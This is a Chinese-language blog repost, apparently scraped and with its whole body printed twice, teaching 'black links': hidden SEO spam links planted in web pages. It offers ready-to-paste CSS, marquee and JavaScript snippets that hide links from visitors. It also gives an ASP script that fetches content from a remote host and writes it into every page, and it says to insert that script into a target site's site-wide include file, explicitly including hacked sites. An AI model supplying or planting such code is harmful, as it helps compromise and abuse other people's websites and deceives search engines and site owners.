黑链-最高明的网站隐藏链接方法
生活随笔
收集整理的這篇文章主要介紹了
黑链-最高明的网站隐藏链接方法
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
黑鏈也可以叫隱藏鏈、顧名思義,就是網(wǎng)頁中沒有顯示的鏈接,而搜索引擎可以看到的鏈接,黑鏈優(yōu)點在于短時間內(nèi)可以迅速提高排名。黑鏈屬于外部鏈接的一種,可以為該鏈接地址指向的網(wǎng)站增加PR值,通俗來說就是網(wǎng)站權(quán)重。這也是為什么有些SEOer喜歡買黑鏈的原因了。下面我們就談一談掛黑鏈的幾種方法。
第一種 CSS、DIV隱藏鏈接代碼
黑鏈代碼1、<div style=”position: absolute; top: -999px; left: -999px;”>
<a href=“http://www.******.net/”>SEM分享</a></div>
黑鏈代碼2、<div style=”position:absolute; left: expression(1-900); top: expression(3-999);”>
<a href=“http://www.******.net/”>SEM分享</a></div>
黑鏈代碼3、<div style=”display:none;”>
<a href=“http://www.******.net/” target=”_blank”>SEM分享</a></div>
復(fù)制代碼,加入到源文件不易發(fā)現(xiàn)的位置即可。
第二種 靜態(tài)頁面黑鏈代碼
<marquee height=1 width=5 SCROLLAMOUNT=3000 SCROLLDELAY=20000>
<a href= “http://www.******.net/”>SEM分享</a></MARQUEE>
第三種 javascript:隱藏鏈接
1、代碼:<script language=”javascript” type=”text/javascript”>
document.write(“<div style=’display:none;’>”);
</script><div>
<a href=http://******.net/>SEM分享</a>
<script language=”javascript” type=”text/javascript”>
document.write(”</div>”);
</script>
2、JS特別優(yōu)化的代碼如下
<script language=”javascript” type=”text/javascript”>
document.write(“<div style=display:none;>”);
</script><div>
<h1><a href=” http://www.coalmill.com/” title=” coal mill” name=” coal mill”> coal mill </a>
<a href=”http://www.crushingequipment.org/” title=” crushing equipment” name=” crushing equipment”> crushing equipment </a>
<a href=“http://www.******.net/” title=”SEM分享” name=”******.net”> SEM分享</a>
<a href=”http://www.t-mill.com/” title=”Raymond mill” name=” Raymond mill”> Raymond mill </a></h1> </div>
<script language=”javascript” type=”text/javascript”>
document.write(“</div>”);
</script>
第四種 最高明的網(wǎng)站隱藏鏈接代碼
沒有很強的功底一般不會找到黑鏈的代碼,所以稱作最高明的黑鏈代碼
<%On Error Resume Next
Server.ScriptTimeOut=9999999
response.write(getHTTPPage(“http://www.******.net/123/”))
function getHTTPPage(url)
dim http
set http=createobject(“MSXML2.XMLHTTP”)
Http.open “GET”,url,false
Http.send()
if Http.readystate<>4 then
exit function
end if
getHTTPPage=bytes2BSTR(Http.responseBody)
set http=nothing
if err.number<>0 then err.Clear
end function
Function bytes2BSTR(vIn)
dim strReturn
dim i,ThisCharCode,NextCharCode
strReturn = “”
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
%>
使用方法:首先建立“http://www.******.net/123/”這樣一個頁面,可以是自己的站也可以是被黑的站,源文件寫入以上代碼,然后在目標(biāo)網(wǎng)站的全站調(diào)用文件寫入以上代碼即可。
第一種 CSS、DIV隱藏鏈接代碼
黑鏈代碼1、<div style=”position: absolute; top: -999px; left: -999px;”>
<a href=“http://www.******.net/”>SEM分享</a></div>
黑鏈代碼2、<div style=”position:absolute; left: expression(1-900); top: expression(3-999);”>
<a href=“http://www.******.net/”>SEM分享</a></div>
黑鏈代碼3、<div style=”display:none;”>
<a href=“http://www.******.net/” target=”_blank”>SEM分享</a></div>
復(fù)制代碼,加入到源文件不易發(fā)現(xiàn)的位置即可。
第二種 靜態(tài)頁面黑鏈代碼
<marquee height=1 width=5 SCROLLAMOUNT=3000 SCROLLDELAY=20000>
<a href= “http://www.******.net/”>SEM分享</a></MARQUEE>
第三種 javascript:隱藏鏈接
1、代碼:<script language=”javascript” type=”text/javascript”>
document.write(“<div style=’display:none;’>”);
</script><div>
<a href=http://******.net/>SEM分享</a>
<script language=”javascript” type=”text/javascript”>
document.write(”</div>”);
</script>
2、JS特別優(yōu)化的代碼如下
<script language=”javascript” type=”text/javascript”>
document.write(“<div style=display:none;>”);
</script><div>
<h1><a href=” http://www.coalmill.com/” title=” coal mill” name=” coal mill”> coal mill </a>
<a href=”http://www.crushingequipment.org/” title=” crushing equipment” name=” crushing equipment”> crushing equipment </a>
<a href=“http://www.******.net/” title=”SEM分享” name=”******.net”> SEM分享</a>
<a href=”http://www.t-mill.com/” title=”Raymond mill” name=” Raymond mill”> Raymond mill </a></h1> </div>
<script language=”javascript” type=”text/javascript”>
document.write(“</div>”);
</script>
第四種 最高明的網(wǎng)站隱藏鏈接代碼
沒有很強的功底一般不會找到黑鏈的代碼,所以稱作最高明的黑鏈代碼
<%On Error Resume Next
Server.ScriptTimeOut=9999999
response.write(getHTTPPage(“http://www.******.net/123/”))
function getHTTPPage(url)
dim http
set http=createobject(“MSXML2.XMLHTTP”)
Http.open “GET”,url,false
Http.send()
if Http.readystate<>4 then
exit function
end if
getHTTPPage=bytes2BSTR(Http.responseBody)
set http=nothing
if err.number<>0 then err.Clear
end function
Function bytes2BSTR(vIn)
dim strReturn
dim i,ThisCharCode,NextCharCode
strReturn = “”
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
%>
使用方法:首先建立“http://www.******.net/123/”這樣一個頁面,可以是自己的站也可以是被黑的站,源文件寫入以上代碼,然后在目標(biāo)網(wǎng)站的全站調(diào)用文件寫入以上代碼即可。
總結(jié)
以上是生活随笔為你收集整理的黑链-最高明的网站隐藏链接方法的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: coroutine php_PHP 协程
- 下一篇: 网络安全:图片防盗链的实现原理